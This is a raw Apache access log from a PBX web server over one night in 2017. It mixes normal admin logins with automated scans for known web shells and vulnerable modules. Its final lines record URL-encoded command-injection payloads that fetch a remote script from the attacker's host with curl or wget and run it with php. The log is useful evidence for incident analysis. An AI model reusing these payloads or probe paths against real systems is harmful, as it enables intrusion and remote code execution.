                    146.0.243.29 - - [09/Jun/2017:17:39:48 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283
                    146.0.243.29 - - [09/Jun/2017:17:43:29 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
                    146.0.243.29 - - [09/Jun/2017:17:43:29 -0400] "GET /recordings/page.framework.php HTTP/1.1" 403 231
                    146.0.243.29 - - [09/Jun/2017:17:43:30 -0400] "GET /recordings/ HTTP/1.1" 200 6677
                    146.0.243.29 - - [09/Jun/2017:17:52:46 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
                    146.0.243.29 - - [09/Jun/2017:17:54:36 -0400] "GET /vtigercrm/test/upload/vtigercrm.txt HTTP/1.1" 404 233
                    13.58.12.77 - admin [09/Jun/2017:18:00:23 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - admin [09/Jun/2017:18:00:23 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:18:00:23 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:18:00:23 -0400] "POST / HTTP/1.1" 200 5409
                    13.58.12.77 - admin [09/Jun/2017:18:11:31 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - admin [09/Jun/2017:18:11:31 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:18:11:31 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:18:11:31 -0400] "POST / HTTP/1.1" 200 5409
                    13.58.12.77 - admin [09/Jun/2017:19:05:42 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - admin [09/Jun/2017:19:05:42 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:19:05:42 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:19:05:42 -0400] "POST / HTTP/1.1" 200 5409
                    213.202.233.77 - - [09/Jun/2017:19:11:49 -0400] "GET /jnkp.php HTTP/1.1" 404 206
                    213.202.233.77 - - [09/Jun/2017:19:11:50 -0400] "GET /assets/jnkp.php HTTP/1.1" 404 213
                    213.202.233.77 - - [09/Jun/2017:19:11:50 -0400] "GET /asterisk/jnkp.php HTTP/1.1" 404 216
                    213.202.233.77 - - [09/Jun/2017:19:11:51 -0400] "GET /recordings/jnkp.php HTTP/1.1" 403 221
                    213.202.233.77 - - [09/Jun/2017:19:11:51 -0400] "GET /jnkp.php HTTP/1.1" 404 206
                    213.202.233.77 - - [09/Jun/2017:19:11:52 -0400] "GET /assets/jnkp.php HTTP/1.1" 404 213
                    213.202.233.77 - - [09/Jun/2017:19:11:53 -0400] "GET /
                    asterisk/jnkp.php HTTP/1.1" 404 216
                    213.202.233.77 - - [09/Jun/2017:19:11:53 -0400] "GET /recordings/jnkp.php HTTP/1.1" 403 221
                    13.58.12.77 - admin [09/Jun/2017:19:16:45 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - admin [09/Jun/2017:19:16:45 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:19:16:45 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:19:16:45 -0400] "POST / HTTP/1.1" 200 5409
                    163.172.69.33 - - [09/Jun/2017:19:44:46 -0400] "GET / HTTP/1.0" 400 362
                    163.172.69.33 - - [09/Jun/2017:19:44:49 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
                    163.172.69.33 - - [09/Jun/2017:19:48:53 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
                    163.172.69.33 - - [09/Jun/2017:19:48:55 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
                    163.172.69.33 - - [09/Jun/2017:19:49:43 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
                    163.172.69.33 - - [09/Jun/2017:19:49:46 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
                    137.116.71.170 - - [09/Jun/2017:19:58:21 -0400] "GET /robots.txt HTTP/1.1" 200 361
                    13.58.12.77 - - [09/Jun/2017:20:10:48 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:20:10:49 -0400] "POST /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:20:10:49 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:20:10:48 -0400] "POST / HTTP/1.1" 200 5409
                    163.172.64.146 - - [09/Jun/2017:20:12:42 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
                    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "POST /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "POST / HTTP/1.1" 200 5409
                    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "POST /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "POST / HTTP/1.1" 200 5409
                    200.116.88.105 - - [09/Jun/2017:21:16:50 -0400] "GET /a2billing/customer/javascript/misc.js HTTP/1.1" 404 235
                    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "POST /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "POST / HTTP/1.1" 200 5409
                    23.239.70.162 - - [09/Jun/2017:22:19:20 -0400] "GET / HTTP/1.1" 200 5409
                    76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET / HTTP/1.1" 200 5409
                    76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
                    76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-edwidgets.js HTTP/1.1" 200 3152
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-migrate-1.2.1.js HTTP/1.1" 200 16621
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-ui-1.11.4.min.js HTTP/1.1" 200 240427
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-colResizable-1.5.min.js HTTP/1.1" 200 5852
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-blockUI.js HTTP/1.1" 200 19910
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-1.11.2.min.js HTTP/1.1" 200 95931
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-ui-timepicker-addon.js HTTP/1.1" 200 78611
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-colorpicker.js HTTP/1.1" 200 17292
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-easing.1.3.js HTTP/1.1" 200 8097
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/gsap/main-gsap.js HTTP/1.1" 200 99007
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/bootstrap.js HTTP/1.1" 200 58330
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/joinable.js HTTP/1.1" 200 119975
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/resizeable.js HTTP/1.1" 200 2406
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-api.js HTTP/1.1" 200 13926
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/jquery.validate.min.js HTTP/1.1" 200 21068
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-custom.js HTTP/1.1" 200 48302
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-login.js HTTP/1.1" 200 9031
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-demo.js HTTP/1.1" 200 1964
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/images/elastix_logo_mini.png HTTP/1.1" 200 6100
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/entypo/font/entypo.woff?71205724 HTTP/1.1" 200 40320
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /favicon.ico HTTP/1.1" 200 99678
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "POST / HTTP/1.1" 200 5409
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "POST / HTTP/1.1" 302 -
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /index.php HTTP/1.1" 200 70583
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/styles.css HTTP/1.1" 200 32972
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/help.css HTTP/1.1" 200 359
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/header.css HTTP/1.1" 200 9165
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/content.css HTTP/1.1" 200 7067
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/rightbar.css HTTP/1.1" 200 1254
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/css/1_style.css HTTP/1.1" 200 3056
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/applet.css HTTP/1.1" 200 1381
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/table.css HTTP/1.1" 200 6473
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/widgets.css HTTP/1.1" 200 485
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/base.js HTTP/1.1" 200 10924
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/sticky_note/sticky_note.css HTTP/1.1" 200 1825
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/sticky_note/sticky_note.js HTTP/1.1" 200 3207
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/1_javascript.js HTTP/1.1" 200 2324
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/iframe.js HTTP/1.1" 200 314
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/3_jquery.flot.time.js HTTP/1.1" 200 11768
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/5_justgage-1.1.0.min.js HTTP/1.1" 200 14662
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/4_raphael-2.1.4.min.js HTTP/1.1" 200 92764
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/2_jquery.flot.js HTTP/1.1" 200 122971
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/elastix_logo_mini2.png HTTP/1.1" 200 5487
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/Icon-user.png HTTP/1.1" 200 21664
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/modalbox_bg.png HTTP/1.1" 200 1000
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /libs/font-icons/font-awesome/fonts/fontawesome-webfont.woff2?v=4.4.0 HTTP/1.1" 200 64464
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /libs/js/jquery/css/smoothness/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 200 208
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=registration&action=isRegistered&rawmode=yes HTTP/1.1" 200 178
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=PerformanceGraphic&action=getContent HTTP/1.1" 200 7518
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=SystemResources&action=getContent HTTP/1.1" 200 2339
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/SystemResources/js/javascript.js?=1497064534974 HTTP/1.1" 200 1363
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/SystemResources/tpl/css/styles.css HTTP/1.1" 200 223
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/images/applet_divisor.png HTTP/1.1" 200 998
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=CommunicationActivity&action=getContent HTTP/1.1" 200 2155
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=HardDrives&action=getContent HTTP/1.1" 200 1913
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=ProcessesStatus&action=getContent HTTP/1.1" 200 8406
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/CommunicationActivity/js/javascript.js?
                    =1497064534975 HTTP/1.1" 200 628
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/CommunicationActivity/tpl/css/styles.css HTTP/1.1" 200 826
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/tpl/css/styles.css HTTP/1.1" 200 1065
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/js/javascript.js?=1497064534976 HTTP/1.1" 200 565
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/images/light_freespace.png HTTP/1.1" 200 958
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/images/light_usedspace.png HTTP/1.1" 200 958
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/tpl/css/styles.css HTTP/1.1" 200 1944
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/js/javascript.js?
                    =1497064534977 HTTP/1.1" 200 2683
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_pbx.png HTTP/1.1" 200 2183
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_im.png HTTP/1.1" 200 2680
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/loading.gif HTTP/1.1" 200 2767
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_arrowdown.png HTTP/1.1" 200 1015
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_fax.png HTTP/1.1" 200 1506
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_headphones.png HTTP/1.1" 200 1905
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_www.png HTTP/1.1" 200 2655
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_db.png HTTP/1.1" 200 1637
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_email.png HTTP/1.1" 200 1998
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_arrowdown-disabled.png HTTP/1.1" 200 190
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/bgicon.png HTTP/1.1" 200 1018
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=News&action=getContent HTTP/1.1" 200 4889
                    76.108.242.230 - - [09/Jun/2017:23:15:38 -0400] "GET /modules/dashboard/applets/News/tpl/css/styles.css HTTP/1.1" 200 934
                    76.108.242.230 - - [09/Jun/2017:23:15:41 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=SystemResources&action=updateStatus HTTP/1.1" 200 98
                    76.108.242.230 - - [09/Jun/2017:23:15:41 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=CommunicationActivity&action=updateStatus HTTP/1.1" 200 83
                    76.108.242.230 - - [09/Jun/2017:23:15:44 -0400] "GET /index.php?menu=pbxadmin HTTP/1.1" 500 -
                    76.108.242.230 - - [09/Jun/2017:23:15:45 -0400] "GET /index.php HTTP/1.1" 500 -
                    92.114.32.161 - - [09/Jun/2017:23:39:42 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
                    92.114.32.161 - - [09/Jun/2017:23:39:43 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
                    92.114.32.161 - - [09/Jun/2017:23:53:55 -0400] "GET /recordings/ HTTP/1.1" 500 -
                    92.114.32.161 - - [09/Jun/2017:23:53:56 -0400] "GET /recordings/ HTTP/1.1" 500 -
                    92.114.32.161 - - [10/Jun/2017:00:17:47 -0400] "GET /recordings/ HTTP/1.1" 500 -
                    92.114.32.161 - - [10/Jun/2017:00:17:47 -0400] "GET / HTTP/1.0" 400 362
                    92.114.32.161 - - [10/Jun/2017:00:24:24 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
                    92.114.32.161 - - [10/Jun/2017:00:24:24 -0400] "GET / HTTP/1.0" 400 362
                    163.172.64.146 - - [10/Jun/2017:04:53:29 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
                    51.15.12.13 - - [10/Jun/2017:04:55:41 -0400] "GET /recordings/index.php HTTP/1.1" 500 -
                    51.15.12.13 - - [10/Jun/2017:04:55:42 -0400] "POST /admin/ajax.php?module=music HTTP/1.1" 404 212
                    51.15.12.13 - - [10/Jun/2017:04:55:44 -0400] "POST /admin/ajax.php?module=blacklist HTTP/1.1" 404 212
                    51.15.12.13 - - [10/Jun/2017:04:55:45 -0400] "POST /admin/ajax.php?module=recordings HTTP/1.1" 404 212
                    51.15.12.13 - - [10/Jun/2017:04:55:46 -0400] "GET /admin/ajax.php HTTP/1.1" 404 212
                    51.15.12.13 - - [10/Jun/2017:04:55:47 -0400] "GET /admin/config.php?display=OpenVAS&handler=api&file=OpenVAS&module=OpenVAS&function=system&args=id HTTP/1.1" 404 214
                    51.15.12.13 - - [10/Jun/2017:04:55:48 -0400] "GET /admin/modules/backup/page.backup.php HTTP/1.1" 404 234
                    51.15.12.13 - - [10/Jun/2017:04:55:49 -0400] "POST /vtigercrm/phprint.php HTTP/1.1" 404 219
                    51.15.12.13 - - [10/Jun/2017:04:55:50 -0400] "POST / HTTP/1.1" 200 5409
                    51.15.12.13 - - [10/Jun/2017:04:55:51 -0400] "POST /admin/modules/admindashboard/phpsysinfo/common_admin_functions.php?c=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 404 264
                    51.15.12.13 - - [10/Jun/2017:04:55:51 -0400] "POST /recordings/jeep.php HTTP/1.1" 403 221
                    51.15.12.13 - - [10/Jun/2017:04:55:52 -0400] "POST /admin/bootstrap.inc.php?mgp=danc3Uf%40t HTTP/1.1" 404 221
                    51.15.12.13 - - [10/Jun/2017:04:55:52 -0400] "POST /recordings/a7a.php HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:53 -0400] "POST /recordings/emad-shell.php HTTP/1.1" 403 227
                    51.15.12.13 - - [10/Jun/2017:04:55:53 -0400] "POST /recordings/emad.php HTTP/1.1" 403 221
                    51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/cmd.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/mcd.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:54 -0400] "POST /recordings/dmc.php?pass=lollol&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:55 -0400] "POST /recordings/cmd.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
